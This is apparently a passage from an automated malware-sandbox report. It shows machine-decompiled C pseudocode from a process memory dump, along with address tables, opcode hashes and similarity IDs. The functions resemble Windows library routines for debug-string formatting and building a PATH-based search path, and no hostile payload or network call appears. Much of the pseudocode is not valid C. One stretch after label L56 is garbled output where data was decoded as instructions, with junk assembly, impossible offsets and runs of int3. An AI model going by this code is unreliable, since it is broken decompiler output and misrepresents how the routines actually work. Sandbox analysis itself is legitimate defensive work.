                                                                          0x0119ba2c
                                                                          0x0119ba30
                                                                          0x0119ba35
                                                                          0x0119ba35
                                                                          0x0119ba41
                                                                          0x0119ba46
                                                                          0x0119ba4c
                                                                          0x0119ba50
                                                                          0x0119ba54
                                                                          0x0119ba6a
                                                                          0x0119ba6e
                                                                          0x0119ba70
                                                                          0x0119ba74
                                                                          0x0119ba78
                                                                          0x0119ba7a
                                                                          0x0119ba7c
                                                                          0x0119ba8e
                                                                          0x0119ba90
                                                                          0x0119ba92
                                                                          0x0119bb14
                                                                          0x0119bb14
                                                                          0x0119bb16
                                                                          0x0119bb16
                                                                          0x00000000
                                                                          0x0119ba7c
                                                                          0x0119bb0a
                                                                          0x0119bb0d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0119bb0f

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0119B9A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 885266447-0
                                                                          • Opcode ID: 59b1c588b5b3f5c0262cdf00d556ef6abb7b7c3bb09a3e88058db3a40b8948c8
                                                                          • Instruction ID: 9627b5e2e6c45282530e4e10adca1ca740bbdaaf939181dc1fdfa868dd0ff386
                                                                          • Opcode Fuzzy Hash: 59b1c588b5b3f5c0262cdf00d556ef6abb7b7c3bb09a3e88058db3a40b8948c8
                                                                          • Instruction Fuzzy Hash: E0515971A18341CFCB28CF69D0D092ABBE5FB88604F15896EF5A687395D730EC44CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E0117B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x124f7a8);
				E011CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E011CD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E011BD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E011BF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L011CDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E011BB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E011BB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E011BE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E011BA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                          0x0117b171
                                                                          0x0117b171
                                                                          0x0117b171
                                                                          0x0117b171
                                                                          0x0117b171
                                                                          0x0117b176
                                                                          0x0117b17b
                                                                          0x0117b180
                                                                          0x0117b186
                                                                          0x0117b18f
                                                                          0x0117b198
                                                                          0x0117b1a4
                                                                          0x0117b1aa
                                                                          0x011d4802
                                                                          0x011d4802
                                                                          0x011d4805
                                                                          0x011d480c
                                                                          0x011d480e
                                                                          0x0117b1d1
                                                                          0x0117b1d3
                                                                          0x0117b1de
                                                                          0x0117b1de
                                                                          0x011d4817
                                                                          0x011d481e
                                                                          0x011d4820
                                                                          0x011d4822
                                                                          0x011d4822
                                                                          0x011d4824
                                                                          0x011d4824
                                                                          0x011d482a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d4835
                                                                          0x011d483a
                                                                          0x011d483d
                                                                          0x011d483f
                                                                          0x011d4842
                                                                          0x011d4842
                                                                          0x011d4842
                                                                          0x011d4846
                                                                          0x011d484c
                                                                          0x011d484e
                                                                          0x011d4851
                                                                          0x011d4851
                                                                          0x011d4853
                                                                          0x011d4854
                                                                          0x011d4854
                                                                          0x011d4858
                                                                          0x011d485a
                                                                          0x011d485a
                                                                          0x011d485d
                                                                          0x011d485f
                                                                          0x011d4861
                                                                          0x011d4861
                                                                          0x011d4866
                                                                          0x011d486b
                                                                          0x011d486e
                                                                          0x011d4871
                                                                          0x011d4876
                                                                          0x011d4876
                                                                          0x011d4878
                                                                          0x011d487b
                                                                          0x011d4884
                                                                          0x011d4884
                                                                          0x00000000
                                                                          0x011d487d
                                                                          0x011d487d
                                                                          0x011d4882
                                                                          0x011d4889
                                                                          0x011d4889
                                                                          0x011d488f
                                                                          0x011d4891
                                                                          0x011d48e0
                                                                          0x011d48e2
                                                                          0x011d48e4
                                                                          0x011d48e4
                                                                          0x011d48e7
                                                                          0x011d48e7
                                                                          0x011d48ed
                                                                          0x011d48f4
                                                                          0x011d48f6
                                                                          0x011d4951
                                                                          0x011d4951
                                                                          0x011d4953
                                                                          0x011d4953
                                                                          0x011d4956
                                                                          0x011d4956
                                                                          0x011d4958
                                                                          0x011d4959
                                                                          0x011d4959
                                                                          0x011d495d
                                                                          0x011d495d
                                                                          0x011d495f
                                                                          0x011d495f
                                                                          0x011d4965
                                                                          0x011d4969
                                                                          0x011d49ba
                                                                          0x011d49ba
                                                                          0x011d49c1
                                                                          0x011d49c5
                                                                          0x011d49cc
                                                                          0x011d49d4
                                                                          0x011d49d7
                                                                          0x011d49da
                                                                          0x011d49e4
                                                                          0x011d49e5
                                                                          0x011d49f3
                                                                          0x011d4a02
                                                                          0x00000000
                                                                          0x011d4a02
                                                                          0x011d4972
                                                                          0x011d4974
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d4976
                                                                          0x011d4979
                                                                          0x011d4982
                                                                          0x011d4983
                                                                          0x011d4984
                                                                          0x011d498b
                                                                          0x011d498d
                                                                          0x011d4991
                                                                          0x011d4993
                                                                          0x011d4999
                                                                          0x011d499d
                                                                          0x011d49a2
                                                                          0x011d49a2
                                                                          0x011d49a2
                                                                          0x011d4999
                                                                          0x011d49ac
                                                                          0x00000000
                                                                          0x011d49b3
                                                                          0x011d48f8
                                                                          0x011d48fe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d48fe
                                                                          0x011d4895
                                                                          0x011d489c
                                                                          0x011d48ad
                                                                          0x011d48b2
                                                                          0x011d48b5
                                                                          0x011d48b7
                                                                          0x011d48ba
                                                                          0x011d48bc
                                                                          0x011d48c6
                                                                          0x011d48c6
                                                                          0x011d48cb
                                                                          0x011d48d1
                                                                          0x011d48d4
                                                                          0x011d48d8
                                                                          0x011d48d8
                                                                          0x00000000
                                                                          0x011d48d8
                                                                          0x011d48be
                                                                          0x011d48c0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d48c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d48c4
                                                                          0x00000000
                                                                          0x011d4882
                                                                          0x011d487b
                                                                          0x011d4904
                                                                          0x011d4906
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d4908
                                                                          0x011d490e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d4910
                                                                          0x011d4917
                                                                          0x011d4917
                                                                          0x00000000
                                                                          0x011d4917
                                                                          0x0117b1ba
                                                                          0x011d47f9
                                                                          0x011d47fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d47fc
                                                                          0x0117b1c0
                                                                          0x0117b1c0
                                                                          0x0117b1c3
                                                                          0x0117b1cb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _vswprintf_s
                                                                          • String ID:
                                                                          • API String ID: 677850445-0
                                                                          • Opcode ID: 0c2bd7d60419dfdc1ae58ebeb3a4a2355e1371638171925bdabb04bfb3068465
                                                                          • Instruction ID: f9ccf9d34dd4489637194f0127b5a717b24ea7da7f9224ff7e46cff8e71b37e7
                                                                          • Opcode Fuzzy Hash: 0c2bd7d60419dfdc1ae58ebeb3a4a2355e1371638171925bdabb04bfb3068465
                                                                          • Instruction Fuzzy Hash: 8651F171D002598FEF3DCFA8C881BAEBBB0BF04714F1141ADD859ABA82D7314941CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 81%
                                                                          			E011A2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200342, char _a1546912022) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t242;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				signed int _t276;
				signed int _t278;
				void* _t280;
				signed int _t281;
				unsigned int _t284;
				signed int _t288;
				void* _t289;
				signed int _t290;
				signed int _t294;
				intOrPtr _t306;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t322;
				signed int _t323;
				void* _t325;
				signed int _t326;
				signed int _t328;
				signed int _t331;
				void* _t332;
				void* _t334;

				_t328 = _t331;
				_t332 = _t331 - 0x4c;
				_v8 =  *0x126d360 ^ _t328;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t322 = 0x126b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t284 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t276 = 0x48;
				_t304 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t315 = 0;
				_v37 = _t304;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t323 = 0xc0000106;
						goto L32;
					} else {
						_t322 = L01194620(_t284,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t322;
						__eflags = _t322;
						if(_t322 == 0) {
							_t323 = 0xc0000017;
							goto L32;
						} else {
							 *(_t322 + 0x44) =  *(_t322 + 0x44) & 0x00000000;
							_t50 = _t322 + 0x48; // 0x48
							_t317 = _t50;
							_t304 = _v32;
							 *(_t322 + 0x3c) = _t276;
							_t278 = 0;
							 *((short*)(_t322 + 0x30)) = _v48;
							__eflags = _t304;
							if(_t304 != 0) {
								 *(_t322 + 0x18) = _t317;
								__eflags = _t304 - 0x1268478;
								 *_t322 = ((0 | _t304 == 0x01268478) - 0x00000001 & 0xfffffffb) + 7;
								E011BF3E0(_t317,  *((intOrPtr*)(_t304 + 4)),  *_t304 & 0x0000ffff);
								_t304 = _v32;
								_t332 = _t332 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t317 = _t317 + (( *_t304 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E012039F2(_t317);
									_t304 = _v32;
									_t317 = _t270;
								}
							}
							_t288 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t323 = _v68;
								__eflags = 0;
								 *((short*)(_t317 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t322 + _t278 * 4;
								_v56 = _t276;
								do {
									__eflags = _t304;
									if(_t304 != 0) {
										_t237 =  *(_v60 + _t288 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t288 * 4);
										 *(_t276 + 0x18) = _t317;
										_t241 =  *(_v60 + _t288 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M011A2959))) {
												case 0:
													__ax =  *0x1268488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E011BF3E0(__edi,  *0x126848c, __ax & 0x0000ffff);
														__eax =  *0x1268488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E011BF3E0(_t317, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x1268480 & 0x0000ffff = E011BF3E0(__edi,  *0x1268484,  *0x1268480 & 0x0000ffff);
													__eax =  *0x1268480 & 0x0000ffff;
													__eax = ( *0x1268480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E011BF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E011BF3E0(_t317, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t332 = _t332 + 0xc;
													_t317 = _t317 + (_t265 >> 1) * 2 + 2;
													__eflags = _t317;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t317 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E011BF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1268478 & 0x0000ffff = E011BF3E0(__edi,  *0x126847c,  *0x1268478 & 0x0000ffff);
													__eax =  *0x1268478 & 0x0000ffff;
													__eax = ( *0x1268478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E012039F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1266e58 & 0x0000ffff = E011BF3E0(__edi,  *0x1266e5c,  *0x1266e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1266e58 & 0x0000ffff;
													__eax = ( *0x1266e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t288 = _v16;
													_t304 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t288 = _t288 + 1;
									_v16 = _t288;
									__eflags = _t288 - _v48;
								} while (_t288 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t315 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M011A2935))) {
							case 0:
								__ax =  *0x1268488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t304 =  &_v64;
								_v80 = E011A2E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1268480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1268480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0118EEF0(0x12679a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0118EB70(__ecx, 0x12679a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t323;
												if(_t323 < 0) {
													L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t284 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1267b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0118EB70(__ecx, 0x12679a0);
										__eax = _v52;
										L36:
										_pop(_t316);
										_pop(_t324);
										__eflags = _v8 ^ _t328;
										_pop(_t277);
										return E011BB640(_t216, _t277, _v8 ^ _t328, _t304, _t316, _t324);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t304 =  &_v36;
									_t274 = E011A2E3E(_t272,  &_v36);
									_t284 = _v36;
									_v76 = _t274;
								}
								if(_t284 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t284;
								}
								goto L14;
							case 6:
								__eax =  *0x1265764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1268478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1268478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1266e58 & 0x0000ffff;
								__eax = ( *0x1266e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t315 = _t315 + 1;
								if(_t315 >= _v48) {
									goto L16;
								} else {
									_t304 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t289 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("sbb al, [ecx]");
					asm("o16 sub [edx], bl");
					_t242 = _t241 + _t332;
					asm("daa");
					asm("sbb al, [ecx]");
					asm("sbb al, [es:ecx]");
					_t325 = _t322 + 1;
					 *_t304 =  *_t304 - _t276;
					 *0x1f011a26 =  *0x1f011a26 + _t242;
					_pop(_t280);
					_push(ds);
					 *((intOrPtr*)(_t242 +  &_a1530200342)) =  *((intOrPtr*)(_t242 +  &_a1530200342)) + _t304;
					_push(ds);
					 *_t304 =  *_t304 + _t242;
					 *_t304 =  *_t304 - _t280;
					 *((intOrPtr*)(_t242 - 0x9fee5d8)) =  *((intOrPtr*)(_t242 - 0x9fee5d8)) + _t242;
					asm("daa");
					asm("sbb al, [ecx]");
					_push(ds);
					 *_t304 =  *_t304 - _t280;
					 *((intOrPtr*)(_t325 + 0x28)) =  *((intOrPtr*)(_t325 + 0x28)) + _t289;
					asm("sbb al, [ecx]");
					asm("daa");
					asm("sbb al, [ecx]");
					asm("fcomp dword [ebx+0x1e]");
					 *((intOrPtr*)(_t242 +  &_a1546912022)) =  *((intOrPtr*)(_t242 +  &_a1546912022)) + _t325;
					_push(ds);
					_t334 = _t332 + _t289;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x124ff00);
					E011CD08C(_t280, _t317, _t325);
					_v44 =  *[fs:0x18];
					_t318 = 0;
					 *_a24 = 0;
					_t281 = _a12;
					__eflags = _t281;
					if(_t281 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t326 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t294 = _t247 * 0xc;
							_v48 = _t294;
							__eflags = _t281 -  *((intOrPtr*)(_t294 + 0x1151664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E011BE5C0(_a8,  *((intOrPtr*)(_t294 + 0x1151668)), _t281);
									_t334 = _t334 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t326 = E011F51BE(_t281,  *((intOrPtr*)(_v48 + 0x115166c)), _a16, _t318, _t326, __eflags, _a20, _a24);
										_v52 = _t326;
										break;
									} else {
										_t247 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t326;
						__eflags = _t326;
						if(_t326 < 0) {
							__eflags = _t326 - 0xc0000100;
							if(_t326 == 0xc0000100) {
								_t290 = _a4;
								__eflags = _t290;
								if(_t290 != 0) {
									_v36 = _t290;
									__eflags =  *_t290 - _t318;
									if( *_t290 == _t318) {
										_t326 = 0xc0000100;
										goto L76;
									} else {
										_t306 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t306 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t290;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t290) {
											__eflags =  *(_t306 + 0x1c);
											if( *(_t306 + 0x1c) == 0) {
												L106:
												_t326 = E011A2AE4( &_v36, _a8, _t281, _a16, _a20, _a24);
												_v32 = _t326;
												__eflags = _t326 - 0xc0000100;
												if(_t326 != 0xc0000100) {
													goto L69;
												} else {
													_t318 = 1;
													_t290 = _v36;
													goto L75;
												}
											} else {
												_t252 = E01186600( *(_t306 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L106;
												} else {
													_t290 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t326 = E011A2C50(_t290, _a8, _t281, _a16, _a20, _a24, _t318);
											L76:
											_v32 = _t326;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0118EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t326 = _a24;
									_t259 = E011A2AE4( &_v36, _a8, _t281, _a16, _a20, _t326);
									_v32 = _t259;
